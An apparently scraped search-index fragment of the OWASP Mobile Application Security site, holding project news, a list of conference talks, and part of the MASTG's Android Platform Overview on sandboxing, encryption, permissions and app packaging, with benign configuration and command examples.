"},{"location":"news/#january-3rd-2019-multilanguage-release-112-of-the-masvs","title":"January 3rd, 2019: Multilanguage Release 1.1.2 of the MASVS","text":"We released the 1.1.2 version of the OWASP MASVS! This is the first version in Chinese, English, French, German, Japanese, Russian, and Spanish! Exactly: we just added French, German, Japanese and Chinese! Obviously this would not be possible without all the volunteers that helped us with translations, feedback, updating, and automating the release process! We are grateful for the awesome team that pulled this off! Want to see the result? Take a look at our release page!
"},{"location":"news/#november-39th-2018-release-110-of-the-mstg","title":"November 39th, 2018: Release 1.1.0 of the MSTG","text":"We released the 1.1.0 version of the OWASP MSTG! Now all requirements of the MASVS have at least one covering testcase. We would like to thank all of our contributors for their hard work! Want to check it out? Check the releases!.
"},{"location":"news/#october-28th-2018-call-for-company-references","title":"October 28th, 2018: Call for Company references","text":"We are looking for company references that are using or have used the OWASP-MSTG and/or MASVS. If you have done so and are ok with being mentioned: please email to sven.schleier@owasp.org.
"},{"location":"news/#october-28th-2018-the-masvs-is-getting-more-translations","title":"October 28th, 2018: The MASVS is getting more translations","text":"Thanks to Romuald, Koki and many others, new translations of the MASVS are popping up. We now have a Japanese translation added and the French, German and Persian translations are in development. Each of them will be released the moment our release-automation of the MASVS is completed. Until then: feel free to checkout the sources!
"},{"location":"news/#october-18th-2018-the-mstg-is-now-officially-an-owasp-lab-project","title":"October 18th, 2018: The MSTG is now officially an OWASP Lab Project!","text":"During AppSec US 2018 in San Jose the Mobile Security Testing Guide was reviewed by several volunteers to assess the maturity of the project. As a result our request for project graduation to lab status was granted. The reviews can be found here.
Thanks to Harold Blankenship for organising the project review event during AppSec US and for pushing things forward for all the OWASP projects and of course to all people that took the effort to review our project!
"},{"location":"news/#october-13th-2018-mstg-102-released-twitter-account","title":"October 13th, 2018: MSTG 1.0.2 released & Twitter account!","text":"While working hard towards the 1.1.0 milestone of the MSTG, we released the 1.0.2 version. From now onward we have better PDF, Epub and Mobi files! We hope to port this to the MASVS after the Github release. We now have an official Twitter account: @OWASP_MAS!
"},{"location":"news/#september-21th-2018-masvs-automation-started","title":"September 21th, 2018: MASVS automation started","text":"Now that the document generation process for the MSTG has been optimized enough for milestone 1.1.0 (and we reached #1000 in Github of issues and Pull requests), we have started to improve the MASVS releasing mechanism. This will be further improved after Appsec USA and the release of 1.1.0 of the MSTG.
"},{"location":"news/#september-16th-2018-mstg-101-released","title":"September 16th, 2018: MSTG 1.0.1 released","text":"The Mobile Security Testing Guide version 1.0.1 has been released using our automated release system (based on tagging). See the Release Notes for all the changes. We now have added pdf support and improved our .docx quiet a lot. We will further improve the release process for the pdf and epubs after milestone 1.1.0.
"},{"location":"news/#september-1st-2018-mobile-security-testing-guide-mentioned-in-nist-sp-163r1","title":"September 1st, 2018: Mobile Security Testing Guide mentioned in NIST SP-163r1","text":"The Mobile Security Testing Guide is now reference in NIST SP 800-163 Revision 1.
"},{"location":"news/#augustus-2nd-2018-mobile-app-security-verification-standard-releases","title":"Augustus 2nd, 2018: Mobile App Security Verification Standard Releases","text":"A lot has happened & we are happy to announce that version 1.1 of the MASVS got released! Not just in English, but in Spanish and Russian as well. Want to know more? check the releases!. We would like to thank our Russian and Spanish speaking volunteers that have put quite some effort in translating the document! Lastly, we would like to announce that not all minor version releases will be in this news-section, unless something really important changed. Do you want to have the latest version of the MASVS? Just check Github!
"},{"location":"news/#june-16th-2018-jeroen-willemsen-joins-as-project-lead","title":"June 16th, 2018: Jeroen Willemsen joins as project lead","text":"Jeroen Willemsen has joined as a project leader for the OMTG project.
"},{"location":"news/#june-15th-2018-mobile-security-testing-guide-release-10","title":"June 15th, 2018: Mobile Security Testing Guide - Release 1.0","text":"The Mobile Security Testing Guide is now available for download in various formats. This is the first release of the MSTG and is a great community effort. We want to thank all contributors through this great journey. Thank you!
"},{"location":"news/#january-13th-2018-mobile-app-security-verification-standard-release-10","title":"January 13th, 2018: Mobile App Security Verification Standard Release 1.0","text":"Version 1.0 of the MASVS is now available for download. This release contains several bug fixes and modifications to security requirements and is our first release.
"},{"location":"news/#september-14th-2017-mobile-app-security-verification-standard-update","title":"September 14th, 2017: Mobile App Security Verification Standard Update","text":"Version 0.9.4 of the MASVS is now available for download. This release contains several bug fixes and modifications to security requirements.
"},{"location":"news/#july-5th-2017-sponsorship-packages-announced","title":"July 5th, 2017: Sponsorship Packages Announced","text":"We are happy to announce that a limited amount of sponsorship packages will be made available shortly through our crowdfunding campaign. With these packages, we offer companies opportunities to create brand awareness and maximize visibility in the mobile security space. 100% of the funds raised go directly into the project budget and will be used to fund production of the final release.
"},{"location":"news/#june-17th-2017-the-owasp-mobile-security-testing-guide-summit-preview","title":"June 17th, 2017: The OWASP Mobile Security Testing Guide - Summit Preview","text":"The MSTG Summit Preview is an experimental proof-of-concept book created on the OWASP Summit 2017 in London. The goal was to improve the authoring process and book deployment pipeline, as well as to demonstrate the viability of the project. Note that the content is not final and will likely change significantly in subsequent releases.
"},{"location":"news/#mobile-security-testing-workshop-on-the-owasp-summit-2017","title":"Mobile Security Testing Workshop on the OWASP Summit 2017","text":"The OWASP MSTG team is organizing a 5-days mobile security track on the OWASP Summit 2017. The track consists of a series of book sprints, each of which focuses on producing content for a specific section in the OWASP MSTG, as well as proof-reading and editing the existing content. The goal is to make as much progress on the guide as is humanly possible. Depending on the number of participants, we\u2019ll split into sub-groups to work on different subsections or topic areas.
"},{"location":"news/#how-to-join","title":"How to Join","text":"Join up for the working session(s) you like by following the link(s) on the mobile security track page, then hitting the \"Edit this page here\" link at the bottom, and adding yourself to the \"participants\" field. Signing up is not mandatory, but helps us to better organize the sessions. Don\u2019t worry though if your session of choice happens on the \"wrong\" day - you can always simply stop by and we\u2019ll brief you on your topic of choice. After all, this is the Woodstock of appsec!
Mobile security track main page:
http://owaspsummit.org/Working-Sessions/Mobile-Security/
Mobile security track schedule:
http://owaspsummit.org/schedule/tracks/Mobile-Security.html/
"},{"location":"news/#april-5th-2017-mobile-app-security-verification-standard-update","title":"April 5th, 2017: Mobile App Security Verification Standard Update","text":"Version 0.9.3 of the MASVS is now available for download. This release contains several bug fixes and modifications to security requirements:
* Merged requirements 7.8 and 7.9 into for simplification\n* Removed Anti-RE controls 8.1 and 8.2\n* Updated MSTG links to current master\n* Section \"Environmental Interaction\" renamed to \"Platform Interaction\"\n* Removed To-dos\n* Fixed some wording & spelling issues\n
"},{"location":"news/#january-31st-2017-mobile-app-security-verification-standard-v092-available-for-download","title":"January 31st, 2017: Mobile App Security Verification Standard v0.9.2 Available For Download","text":"The Mobile App Security Verification Standard (MASVS) has undergone a major revision, including a re-design of the security model and verification levels. We also revised many security requirements to address the multitude of issues raised on GitHub. The result is MASVS v0.9.2, which is now available for download in PDF format.
As the MASVS is nearing maturity, we have decided to freeze the requirements until the Mobile Testing Guide and checklists \"catch up\" (due to the one-to-one mapping between requirements in the MASVS and MSTG, changes to the requirements make it necessary to update the other documents as well, causing repeated effort). Unless major issues pop up, the current list will therefore remain in place until MASVS/MSTG v1.0, and further changes will be reserved for v1.1 or later releases.
The MASVS is a community effort to establish security requirements for designing, developing and testing secure mobile apps on iOS and Android. Join the OWASP Mobile Security Project Slack Channel to meet the project members! You can sign up for an account here.
"},{"location":"news/#january-28th-2017-mobile-crackmes-and-reversing-tutorials","title":"January 28th, 2017: Mobile Crackmes and Reversing Tutorials","text":"A key goal of the OWASP Mobile Testing Project is to build the ultimate learning resource and reference guide for mobile app reversers. As hands-on hacking is by far the best way to learn, we'd like to link most of the content to practical examples.
Starting now, we'll be adding crackmes for Android and iOS to the GitHub repo that will then be used as examples throughout the guide. The goal is to collect enough resources for demonstrating the most important tools and techniques in our guide, plus additional crackmes for practicing. For starters there are three challenges:
One of these three already has a documented solution in the guide. Tutorials for solving the other two still need to be added.
"},{"location":"news/#we-need-more-authors-and-contributors","title":"We Need More Authors and Contributors!","text":"Maybe you have noticed that the reverse engineering sections in the Mobile Testing Guide are incomplete. The reason: We're still in the starting stages and don't have a lot of authors and contributors (in fact, 99% of the reversing content was produced by one guy). We'd love to welcome you as a contributor of crackmes, tutorials, writeups, or simply new ideas for this project.
"},{"location":"news/#what-you-can-do","title":"What You Can Do","text":"The OWASP MSTG is an open project and there's a lot of flexibility - it mostly depends on your skill set and willingness to commit your time. That said, the some areas that need help are:
Help us figure out resiliency testing processes and obfuscation metrics The reversing part of the guide consists of the following chapters:
Tampering and Reverse Engineering - General Overview
Read the Contribution Guide first, and join the OWASP Mobile Security Project Slack Channel, where you'll find all the other project members.
"},{"location":"news/#january-22nd-2017-mobile-testing-guide-toc-available","title":"January 22nd, 2017: Mobile Testing Guide TOC Available","text":"As of now, we'll be auto-generating a table of contents out of the current MSTG master branch. This reflects the current state of the guide, and should make it easier to coordinate work between authors. A short-term goal is to finalize the structure of the guide so we get a clearer picture of what will be included in the final document. Lead authors are encouraged to complete the outline of their respective chapters.
On another note, we still need additional authors to help with all sections of the guide, including mobile operating system overviews, testing processes and techniques, and reverse engineering. Especially iOS authors are in short supply! As usual, ping us on the Slack Channel if you want to contribute.
"},{"location":"news/#december-4th-2016-call-for-authors-the-ultimate-open-source-mobile-app-reverse-engineering-guide","title":"December 4th, 2016: Call For Authors: The Ultimate Open-Source Mobile App Reverse Engineering Guide","text":"Reverse engineering is an art, and describing every available facet of it would fill a whole library. The sheer range techniques and possible specializations is mind-blowing: One can spend years working on a very specific, isolated sub-problem, such as automating malware analysis or developing novel de-obfuscation methods. For mobile app security testers, it can be challenging to filter through the vast amount of information and build a working methodology. Things become even more problematic when one is tasked to assess apps that are heavily obfuscated and have anti-tampering measures built in.
One of the main goals in the MSTG is to build the ultimate resource for mobile reverse engineers. This includes not only basic static and dynamic analysis, but also advanced de-obfuscation, scripting and automation. Obviously, writing all this content is a lot of work, both in terms of general content and OS-specific how-tos. We're therefore looking for talented authors that want to join the project early on. Topics include the following:
All of this is unpaid, volunteer work. However, depending on your contribution, you will be named in the \"lead authors\" or \"contributors\" list, and you'll be able to point to the fact that you co-authored the guide. You'll also be contributing to the field, helping others who are just starting out, and in turn becoming a happier person yourself (reaping the full benefits of your altruism).
"},{"location":"news/#where-do-i-sign-up","title":"Where do I sign up?","text":"First of all, have a look at the existing RE chapters outline. You'll probably immediately have ideas on how you can contribute. If that's the case, read the Contribution Guide first.
Then contact Bernhard Mueller - ideally directly on the OWASP Mobile Security Project Slack Channel, where you'll find all the other project members. You can sign up for an account here.
"},{"location":"talks/","title":"\ud83c\udf99 Talks","text":"Date Event Title Video Slides October 2023 OWASP AppSec US 2023 Refactoring Mobile App Security Soon Slides October 2023 OWASP AppSec US 2023 OWASP MAS Project Showcase Video Slides February 2023 Tech Talks by NowSecure OWASP MASVS v2 Updates Video Slides February 2023 OWASP AppSec EU 2023 Mobile Wanderlust\u201d! Our journey to Version 2.0! Video Slides November 2022 OWASP AppSec US 2022 Mobile Wanderlust\u201d! Our journey to Version 2.0! Soon Slides October 2022 NSConnect Inside the OWASP MASVS Refactor v2.0 Video Slides October 2022 Cybersec Chile Securing Mobile Apps with the OWASP MASVS and MASTG: Secure Storage and IPC N/A Slides September 2022 OWASP Global AppSec APAC Securing Mobile Apps with the OWASP MASVS and MASTG. Our journey to Version 2.0! Soon Slides July 2022 droidCon Berlin Securing Mobile Apps with the OWASP MASVS & MSTG Video Slides June 2022 OWASP Tunisia Securing Mobile Apps with the MASVS. Our Journey to v2.0 Video Slides June 2022 OWASP AppSec EU \u201cMobile Wanderlust\u201d! Our journey to Version 2.0! Video Slides February 2022 OWASP Toronto Insider's Guide to Mobile AppSec with OWASP MASVS Video N/A November 2021 NSConnect MASVS & MSTG Refactoring Video Slides September 2021 OWASP 20th Anniversary MASVS & MSTG Refactoring Video Slides September 2020 Ekoparty Security Conference (Spanish) OWASP Mobile Project and how to use it for white hat hacking Video Slides May 2020 OWASP Dutch Virtual chapter meetup MSTG Update Video N/A February 2020 OWASP New Zealand Day Building Secure Mobile Apps (you don\u2019t have to learn it the hard way!) N/A N/A January 2020 iOS Conf Singapore Building Secure iOS Apps (you don\u2019t have to learn it the hard way!) Video Slides October 2019 OWASP AppSec Day Melbourne Fixing Mobile AppSec Video N/A September 2019 OWASP Global AppSec Amsterdam Fast Forwarding mobile security with the OWASP Mobile Security Testing Guide N/A N/A September 2019 r2con in Barcelona radare2 and Frida in the OWASP Mobile Security Testing Guide Video Slides Summer 2019 Open Security summit 2019 Open Security summit 2019 N/A Slides April 2019 OWASP Kyiv OWASP MSTG in real life N/A N/A March 2019 AppDevcon (Amsterdam) Securing your mobile app with the OWASP Mobile Security Testing Guide N/A N/A November 2018 OWASP BeNeLux days 2018 Fast forwarding mobile security with the MSTG N/A Slides November 2018 OWASP Germany Day 2018 Introduction to Mobile Security Testing: Approaches and Examples using OWASP MSTG (in German) Video Slides October 2018 DBS AppSecCon (Singapore) Fixing Mobile AppSec N/A N/A October 2018 OWASP Bay Area Chapter Mobile Testing Workshop N/A N/A October 2018 OWASP AppSec USA Fixing Mobile AppSec N/A N/A October 2018 CSC 2018 A Perspective on Mobile Security in IoT and how OWASP can Help N/A Slides January 2018 OWASP North Sweden Umea Mobile Security Essentials N/A N/A January 2018 OWASP Gothenburg Mobile Security Essentials: All about the keying material Video N/A January 2018 OWASP Gotentburg Mobile Security Essentials: Introduction into OMTG Video N/A 2017 OWASP Day Indonesia 2017 Fixing Mobile AppSec N/A N/A 2017 OWASP Poland Day 2017 Testing Mobile Applications N/A Slides 2017 OWASP AppSec EU 2017 Fixing Mobile AppSec Video Slides"},{"location":"MASTG/","title":"OWASP MASTG","text":"GitHub Repo
Previously known as OWASP MSTG (Mobile Security Testing Guide)
The OWASP Mobile Application Security Testing Guide (MASTG) is a comprehensive manual for mobile app security testing and reverse engineering. It describes technical processes for verifying the controls listed in the OWASP MASVS.
Download the MASTG
Start exploring the MASTG:
Tests Techniques Tools Apps
Support the project by purchasing the OWASP MASTG on leanpub.com. All funds raised through sales of this book go directly into the project budget and will be used to for technical editing and designing the book and fund production of future releases.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/","title":"Android Platform Overview","text":"This chapter introduces the Android platform from an architecture point of view. The following five key areas are discussed:
Visit the official Android developer documentation website for more details about the Android platform.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-architecture","title":"Android Architecture","text":"Android is a Linux-based open source platform developed by the Open Handset Alliance (a consortium lead by Google), which serves as a mobile operating system (OS). Today the platform is the foundation for a wide variety of modern technology, such as mobile phones, tablets, wearable tech, TVs, and other smart devices. Typical Android builds ship with a range of pre-installed (\"stock\") apps and support installation of third-party apps through the Google Play store and other marketplaces.
Android's software stack is composed of several different layers. Each layer defines interfaces and offers specific services.
Kernel: At the lowest level, Android is based on a variation of the Linux Kernel containing some significant additions, including Low Memory Killer, wake locks, the Binder IPC driver, etc. For the purpose of the MASTG, we'll focus on the user-mode part of the OS, where Android significantly differs from a typical Linux distribution. The two most important components for us are the managed runtime used by applications (ART/Dalvik) and Bionic, Android\u2019s version of glibc, the GNU C library.
HAL: On top of the kernel, the Hardware Abstraction Layer (HAL) defines a standard interface for interacting with built-in hardware components. Several HAL implementations are packaged into shared library modules that the Android system calls when required. This is the basis for allowing applications to interact with the device's hardware. For example, it allows a stock phone application to use a device's microphone and speaker.
Runtime Environment: Android apps are written in Java and Kotlin and then compiled to Dalvik bytecode which can be then executed using a runtime that interprets the bytecode instructions and executes them on the target device. For Android, this is the Android Runtime (ART). This is similar to the JVM (Java Virtual Machine) for Java applications, or the Mono Runtime for .NET applications.
Dalvik bytecode is an optimized version of Java bytecode. It is created by first compiling the Java or Kotlin code to Java bytecode, using the javac and kotlinc compilers respectively, producing .class files. Finally, the Java bytecode is converted to Dalvik bytecode using the d8 tool. Dalvik bytecode is packed within APK and AAB files in the form of .dex files and is used by a managed runtime on Android to execute it on the device.
Before Android 5.0 (API level 21), Android executed bytecode on the Dalvik Virtual Machine (DVM), where it was translated into machine code at execution time, a process known as just-in-time (JIT) compilation. This enables the runtime to benefit from the speed of compiled code while maintaining the flexibility of code interpretation.
Since Android 5.0 (API level 21), Android executes bytecode on the Android Runtime (ART) which is the successor of the DVM. ART provides improved performance as well as context information in app native crash reports, by including both Java and native stack information. It uses the same Dalvik bytecode input to maintain backward compatibility. However, ART executes the Dalvik bytecode differently, using a hybrid combination of ahead-of-time (AOT), just-in-time (JIT) and profile-guided compilation.
Source: https://lief-project.github.io/doc/latest/tutorials/10_android_formats.html
Sandboxing: Android apps don't have direct access to hardware resources, and each app runs in its own virtual machine or sandbox. This enables the OS to have precise control over resources and memory access on the device. For instance, a crashing app doesn't affect other apps running on the same device. Android controls the maximum number of system resources allocated to apps, preventing any one app from monopolizing too many resources. At the same time, this sandbox design can be considered as one of the many principles in Android's global defense-in-depth strategy. A malicious third-party application, with low privileges, shouldn't be able to escape its own runtime and read the memory of a victim application on the same device. In the following section we take a closer look at the different defense layers in the Android operating system. Learn more in the section \"Software Isolation\".
You can find more detailed information in the Google Source article \"Android Runtime (ART)\", the book \"Android Internals\" by Jonathan Levin and the blog post \"Android 101\" by @_qaz_qaz.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-security-defense-in-depth-approach","title":"Android Security: Defense-in-Depth Approach","text":"The Android architecture implements different security layers that, together, enable a defense-in-depth approach. This means that the confidentiality, integrity or availability of sensitive user-data or applications doesn't hinge on one single security measure. This section brings an overview of the different layers of defense that the Android system provides. The security strategy can be roughly categorized into four distinct domains, each focusing on protecting against certain attack models.
Android supports device encryption from Android 2.3.4 (API level 10) and it has undergone some big changes since then. Google imposed that all devices running Android 6.0 (API level 23) or higher had to support storage encryption, although some low-end devices were exempt because it would significantly impact their performance.
Full-Disk Encryption (FDE): Android 5.0 (API level 21) and above support full-disk encryption. This encryption uses a single key protected by the user's device password to encrypt and decrypt the user data partition. This kind of encryption is now considered deprecated and file-based encryption should be used whenever possible. Full-disk encryption has drawbacks, such as not being able to receive calls or not having operative alarms after a reboot if the user does not enter the password to unlock.
File-Based Encryption (FBE): Android 7.0 (API level 24) supports file-based encryption. File-based encryption allows different files to be encrypted with different keys so they can be deciphered independently. Devices that support this type of encryption support Direct Boot as well. Direct Boot enables the device to have access to features such as alarms or accessibility services even if the user didn't unlock the device.
Note: you might hear of Adiantum, which is an encryption method designed for devices running Android 9 (API level 28) and higher whose CPUs lack AES instructions. Adiantum is only relevant for ROM developers or device vendors, Android does not provide an API for developers to use Adiantum from applications. As recommended by Google, Adiantum should not be used when shipping ARM-based devices with ARMv8 Cryptography Extensions or x86-based devices with AES-NI. AES is faster on those platforms.
Further information is available in the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#trusted-execution-environment-tee","title":"Trusted Execution Environment (TEE)","text":"In order for the Android system to perform encryption it needs a way to securely generate, import and store cryptographic keys. We are essentially shifting the problem of keeping sensitive data secure towards keeping a cryptographic key secure. If the attacker can dump or guess the cryptographic key, the sensitive encrypted data can be retrieved.
Android offers a trusted execution environment in dedicated hardware to solve the problem of securely generating and protecting cryptographic keys. This means that a dedicated hardware component in the Android system is responsible for handling cryptographic key material. Three main modules are responsible for this:
Hardware-backed KeyStore: This module offers cryptographic services to the Android OS and third-party apps. It enables apps to perform cryptographic sensitive operations in an TEE without exposing the cryptographic key material.
StrongBox: In Android 9 (Pie), StrongBox was introduced, another approach to implement a hardware-backed KeyStore. While previous to Android 9 Pie, a hardware-backed KeyStore would be any TEE implementation that lies outside of the Android OS kernel. StrongBox is an actual complete separate hardware chip that is added to the device on which the KeyStore is implemented and is clearly defined in the Android documentation. You can check programmatically whether a key resides in StrongBox and if it does, you can be sure that it is protected by a hardware security module that has its own CPU, secure storage, and True Random Number Generator (TRNG). All the sensitive cryptographic operations happen on this chip, in the secure boundaries of StrongBox.
GateKeeper: The GateKeeper module enables device pattern and password authentication. The security sensitive operations during the authentication process happen inside the TEE that is available on the device. GateKeeper consists of three main components, (1) gatekeeperd
which is the service that exposes GateKeeper, (2) GateKeeper HAL, which is the hardware interface and (3) the TEE implementation which is the actual software that implements the GateKeeper functionality in the TEE.
We need to have a way to ensure that code that is being executed on Android devices comes from a trusted source and that its integrity is not compromised. In order to achieve this, Android introduced the concept of verified boot. The goal of verified boot is to establish a trust relationship between the hardware and the actual code that executes on this hardware. During the verified boot sequence, a full chain of trust is established starting from the hardware-protected Root-of-Trust (RoT) up until the final system that is running, passing through and verifying all the required boot phases. When the Android system is finally booted you can rest assured that the system is not tampered with. You have cryptographic proof that the code which is running is the one that is intended by the OEM and not one that has been maliciously or accidentally altered.
Further information is available in the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#software-isolation","title":"Software Isolation","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-users-and-groups","title":"Android Users and Groups","text":"Even though the Android operating system is based on Linux, it doesn't implement user accounts in the same way other Unix-like systems do. In Android, the multi-user support of the Linux kernel is used to sandbox apps: with a few exceptions, each app runs as though under a separate Linux user, effectively isolated from other apps and the rest of the operating system.
The file system/core/include/private/android_filesystem_config.h includes a list of the predefined users and groups system processes are assigned to. UIDs (userIDs) for other applications are added as the latter are installed. For more details, check out the blog post \"An Overview Of Application Sandbox\" by Bin Chen on Android sandboxing.
For example, Android 9.0 (API level 28) defines the following system users:
#define AID_ROOT 0 /* traditional unix root user */\n #...\n #define AID_SYSTEM 1000 /* system server */\n #...\n #define AID_SHELL 2000 /* adb and debug shell user */\n #...\n #define AID_APP_START 10000 /* first app user */\n ...\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#selinux","title":"SELinux","text":"Security-Enhanced Linux (SELinux) uses a Mandatory Access Control (MAC) system to further lock down which processes should have access to which resources. Each resource is given a label in the form of user:role:type:mls_level
which defines which users are able to execute which types of actions on it. For example, one process may only be able to read a file, while another process may be able to edit or delete the file. This way, by working on a least-privilege principle, vulnerable processes are more difficult to exploit via privilege escalation or lateral movement.
Further information is available on the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#permissions","title":"Permissions","text":"Android implements an extensive permissions system that is used as an access control mechanism. It ensures controlled access to sensitive user data and device resources. Android categorizes permissions into different types offering various protection levels.
Prior to Android 6.0 (API level 23), all permissions an app requested were granted at installation (Install-time permissions). From API level 23 onwards, the user must approve some permissions requests during runtime (Runtime permissions).
Further information is available in the Android documentation including several considerations and best practices.
To learn how to test app permissions refer to the Testing App Permissions section in the \"Android Platform APIs\" chapter.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#network-security","title":"Network security","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#tls-by-default","title":"TLS by Default","text":"By default, since Android 9 (API level 28), all network activity is treated as being executed in a hostile environment. This means that the Android system will only allow apps to communicate over a network channel that is established using the Transport Layer Security (TLS) protocol. This protocol effectively encrypts all network traffic and creates a secure channel to a server. It may be the case that you would want to use clear traffic connections for legacy reasons. This can be achieved by adapting the res/xml/network_security_config.xml
file in the application.
Further information is available in the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#dns-over-tls","title":"DNS over TLS","text":"System-wide DNS over TLS support has been introduced since Android 9 (API level 28). It allows you to perform queries to DNS servers using the TLS protocol. A secure channel is established with the DNS server through which the DNS query is sent. This assures that no sensitive data is exposed during a DNS lookup.
Further information is available on the Android Developers blog.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#anti-exploitation","title":"Anti-exploitation","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#aslr-kaslr-pie-and-dep","title":"ASLR, KASLR, PIE and DEP","text":"Address Space Layout Randomization (ASLR), which has been part of Android since Android 4.1 (API level 15), is a standard protection against buffer-overflow attacks, which makes sure that both the application and the OS are loaded to random memory addresses making it difficult to get the correct address for a specific memory region or library. In Android 8.0 (API level 26), this protection was also implemented for the kernel (KASLR). ASLR protection is only possible if the application can be loaded at a random place in memory, which is indicated by the Position Independent Executable (PIE) flag of the application. Since Android 5.0 (API level 21), support for non-PIE enabled native libraries was dropped. Finally, Data Execution Prevention (DEP) prevents code execution on the stack and heap, which is also used to combat buffer-overflow exploits.
Further information is available on the Android Developers blog.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#seccomp-filter","title":"SECCOMP Filter","text":"Android applications can contain native code written in C or C++. These compiled binaries can communicate both with the Android Runtime through Java Native Interface (JNI) bindings, and with the OS through system calls. Some system calls are either not implemented, or are not supposed to be called by normal applications. As these system calls communicate directly with the kernel, they are a prime target for exploit developers. With Android 8 (API level 26), Android has introduced the support for Secure Computing (SECCOMP) filters for all Zygote based processes (i.e. user applications). These filters restrict the available syscalls to those exposed through bionic.
Further information is available on the Android Developers blog.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-application-structure","title":"Android Application Structure","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#communication-with-the-operating-system","title":"Communication with the Operating System","text":"Android apps interact with system services via the Android Framework, an abstraction layer that offers high-level Java APIs. The majority of these services are invoked via normal Java method calls and are translated to IPC calls to system services that are running in the background. Examples of system services include:
The framework also offers common security functions, such as cryptography.
The API specifications change with every new Android release. Critical bug fixes and security patches are usually applied to earlier versions as well.
Noteworthy API versions:
Android development releases follow a unique structure. They are organized into families and given alphabetical codenames inspired by tasty treats. You can find them all here.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#the-app-sandbox","title":"The App Sandbox","text":"Apps are executed in the Android Application Sandbox, which separates the app data and code execution from other apps on the device. As mentioned before, this separation adds a first layer of defense.
Installation of a new app creates a new directory named after the app package, which results in the following path: /data/data/[package-name]
. This directory holds the app's data. Linux directory permissions are set such that the directory can be read from and written to only with the app's unique UID.
We can confirm this by looking at the file system permissions in the /data/data
folder. For example, we can see that Google Chrome and Calendar are assigned one directory each and run under different user accounts:
drwx------ 4 u0_a97 u0_a97 4096 2017-01-18 14:27 com.android.calendar\ndrwx------ 6 u0_a120 u0_a120 4096 2017-01-19 12:54 com.android.chrome\n
Developers who want their apps to share a common sandbox can sidestep sandboxing. When two apps are signed with the same certificate and explicitly share the same user ID (having the sharedUserId in their AndroidManifest.xml files), each can access the other's data directory. See the following example to achieve this in the NFC app:
<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\"\n package=\"com.android.nfc\"\n android:sharedUserId=\"android.uid.nfc\">\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#linux-user-management","title":"Linux User Management","text":"Android leverages Linux user management to isolate apps. This approach is different from user management usage in traditional Linux environments, where multiple apps are often run by the same user. Android creates a unique UID for each Android app and runs the app in a separate process. Consequently, each app can access its own resources only. This protection is enforced by the Linux kernel.
Generally, apps are assigned UIDs in the range of 10000 and 99999. Android apps receive a user name based on their UID. For example, the app with UID 10188 receives the user name u0_a188
. If the permissions an app requested are granted, the corresponding group ID is added to the app's process. For example, the user ID of the app below is 10188. It belongs to the group ID 3003 (inet). That group is related to android.permission.INTERNET permission. The output of the id
command is shown below.
$ id\nuid=10188(u0_a188) gid=10188(u0_a188) groups=10188(u0_a188),3003(inet),\n9997(everybody),50188(all_a188) context=u:r:untrusted_app:s0:c512,c768\n
The relationship between group IDs and permissions is defined in the following file:
frameworks/base/data/etc/platform.xml
<permission name=\"android.permission.INTERNET\" >\n <group gid=\"inet\" />\n</permission>\n\n<permission name=\"android.permission.READ_LOGS\" >\n <group gid=\"log\" />\n</permission>\n\n<permission name=\"android.permission.WRITE_MEDIA_STORAGE\" >\n <group gid=\"media_rw\" />\n <group gid=\"sdcard_rw\" />\n</permission>\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#zygote","title":"Zygote","text":"The process Zygote
starts up during Android initialization. Zygote is a system service for launching apps. The Zygote process is a \"base\" process that contains all the core libraries the app needs. Upon launch, Zygote opens the socket /dev/socket/zygote
and listens for connections from local clients. When it receives a connection, it forks a new process, which then loads and executes the app-specific code.
In Android, the lifetime of an app process is controlled by the operating system. A new Linux process is created when an app component is started and the same app doesn\u2019t yet have any other components running. Android may kill this process when the latter is no longer necessary or when reclaiming memory is necessary to run more important apps. The decision to kill a process is primarily related to the state of the user's interaction with the process. In general, processes can be in one of four states.
A visible process is a process that the user is aware of, so killing it would have a noticeable negative impact on user experience. One example is running an activity that's visible to the user on-screen but not in the foreground.
A service process is a process hosting a service that has been started with the startService
method. Though these processes aren't directly visible to the user, they are generally things that the user cares about (such as background network data upload or download), so the system will always keep such processes running unless there's insufficient memory to retain all foreground and visible processes.
onCreate
handler is called when the app process is first created. Other callback methods include onLowMemory
, onTrimMemory
and onConfigurationChanged
.Android applications can be shipped in two forms: the Android Package Kit (APK) file or an Android App Bundle (.aab). Android App Bundles provide all the resources necessary for an app, but defer the generation of the APK and its signing to Google Play. App Bundles are signed binaries which contain the code of the app in several modules. The base module contains the core of the application. The base module can be extended with various modules which contain new enrichments/functionalities for the app as further explained on the developer documentation for app bundle. If you have an Android App Bundle, you can best use the bundletool command line tool from Google to build unsigned APKs in order to use the existing tooling on the APK. You can create an APK from an AAB file by running the following command:
bundletool build-apks --bundle=/MyApp/my_app.aab --output=/MyApp/my_app.apks\n
If you want to create signed APKs ready for deployment to a test device, use:
$ bundletool build-apks --bundle=/MyApp/my_app.aab --output=/MyApp/my_app.apks\n--ks=/MyApp/keystore.jks\n--ks-pass=file:/MyApp/keystore.pwd\n--ks-key-alias=MyKeyAlias\n--key-pass=file:/MyApp/key.pwd\n
We recommend that you test both the APK with and without the additional modules, so that it becomes clear whether the additional modules introduce and/or fix security issues for the base module.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-manifest","title":"Android Manifest","text":"Every app has an Android Manifest file, which embeds content in binary XML format. The standard name of this file is AndroidManifest.xml. It is located in the root directory of the app\u2019s Android Package Kit (APK) file.
